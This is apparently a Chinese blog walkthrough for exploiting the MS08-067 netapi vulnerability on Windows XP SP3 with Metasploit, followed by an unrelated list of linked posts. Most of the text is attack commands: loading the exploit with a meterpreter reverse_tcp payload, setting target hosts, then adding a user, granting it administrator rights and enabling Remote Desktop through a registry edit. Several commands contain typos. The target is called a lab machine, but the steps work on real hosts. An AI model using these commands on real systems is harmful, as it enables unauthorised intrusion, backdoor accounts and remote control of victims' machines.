WIN xp sp3 系统上Ms08_067_netapi漏洞利用
msfconsole
![](/assets/blank.gif)
service postgresql statr
search ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
![](/assets/blank.gif)
set payload windows/meterpreter/reverse_tcp
此时加载完毕可以查看需要设置的参数:
show options
然后如下图所示:
![](/assets/blank.gif)
set RHOST 被攻击者ip
set LHOST 被攻击者ip
exploit
![](/assets/blank.gif)
user net 用户名 密码 /add
(2):提权:
net localgroup administrators wmc /add
![](/assets/blank.gif)
![](/assets/blank.gif)
7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
netstat -na
![](/assets/blank.gif)
(2):显然并没有,那么我们就给它打开:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
![](/assets/blank.gif)
![](/assets/blank.gif)
![](/assets/blank.gif)
![](/assets/blank.gif)
![](/assets/blank.gif)
![](/assets/blank.gif)
WIN xp sp3 系统上Ms08_067_netapi漏洞利用相关推荐
- win xp sp3系统如何安装微信. 2023-03-01
下载地址 WeChat_for_XP_SP3_To_Vista.exe 下载后直接安装即可 该版本为老旧版本,官方新版本已不支持xp系统
- 装机员 GHOST WIN XP SP3 装机版2016
软件 软件名称: GHOST WIN XP装机版2016 软件语言: 简体中文 软件大小: 1.76 GB 大小: 发布日期: 2016-05-28 文件名称: ZJY_GHOST XP_SP3_ ...
- 【引用】雨林木风Ghost XP SP3系统
近来在网上闲逛,系统之事我想也不用多说大家都知道, 因WR原因导致各家系统站点都已经关闭下载. 但在网上大家还是可以看到有下载地方的,对于是提供原来无 修改过的系统下载我们当然欢迎,对他们应该感谢分享 ...
- 发现了问题解决不了--转:【win XP SP3 不能安装HD声卡驱动的解决办法】
在装SQL2005时,提示sp3警告,所以就删补丁,结果所有驱动都没有了.系统还是sp3.开始忙碌状驱动,到声卡驱动就怎么也无法成功~解决问题终于发现: 转自: http://www.pczpg.co ...
- 常见文件上传漏洞利用
常见文件上传漏洞利用 一.常见文件上传绕过方法 1.前端javascript校验文件名 2.MIME类型检测绕过 3.大小写绕过 4.双写.点.空格绕过 5.特殊后缀名绕过 6.文件内容检测 7.使用 ...
- 文件上传漏洞利用介绍
目录 文件上传漏洞利用介绍 1.绕过js验证 2.绕过MIME-TYPE验证 3.绕过基于黑名单验证 基于文件后缀名验证介绍 基于文件后缀名验证方式的分类 基于黑名单验证代码分析 利用apache配置 ...
- xp计算机无法远程桌面连接,XP sp3系统下远程桌面不能连接到指定计算机的解决方案...
在使用电脑的过程中,我们常常会使用系统中的远程功能.然而在XP sp3系统中,有的小伙伴使用远程桌面软件时,电脑却弹出远程桌面无法连接到指定计算机的提示.那么遇到这种情况该怎么解决呢?下面想就给大家介 ...
- 华硕台式机笔记本预装GHOST XP SP3系统V2013(DVD版)
华硕台式机&笔记本预装GHOST XP SP3系统V2013(DVD版) 下载地址:http://www.xiazaijidi.com/xp/ 文件名称:ASUS_NotebookPC_V20 ...
- 『原创』ewebeditor 2.1.6 上传漏洞利用工具
朋友说原来的ewebeditor 2.1.6 HTML版用着太麻烦,每次还得输入地址,叫我帮忙写一个...- -||| ewebeditor 2.1.6 上传漏洞利用工具 ewebeditor在网上用 ...
最新文章
- Dell服务器配置RAID1+RAID0磁盘阵列
- 从MVC到前后端分离
- Repo 命令参考资料
- APK加壳【2】内存加载dex实现详解
- python switch_从邮箱验证小项目说python字符串判断与if判断那些事儿
- PostMessage与SendMessage
- FineUILearning
- 指定查找区间,查找学生姓名并显示是否修改成功
- python编程语言优缺点_原创001 第一次接触这个神奇而又无所不能的编程语言:Python...
- 1110 Complete Binary Tree(甲级)
- 【转】对路径**的访问被拒绝
- 通过PCA算法对iris数据集进行降维处理
- 原创Maya mel系列插件推荐
- IPVS使用的Netfilter Hook点
- html发起微信或支付宝支付,vue实现-微信网页中唤起支付宝支付
- 关于python无法显示中文的问题:SyntaxError: Non-ASCII character '\xe4' in file test.py on line 3
- SpringCloud——服务接口(api)
- JAVA JComboBox的监听事件(ActionListener、ItemListener)
- YoutubeAPI使用
- 医学图像预处理(四)—— 提取包含目标的切片(比如仅提取包含肿瘤或肝脏的切片)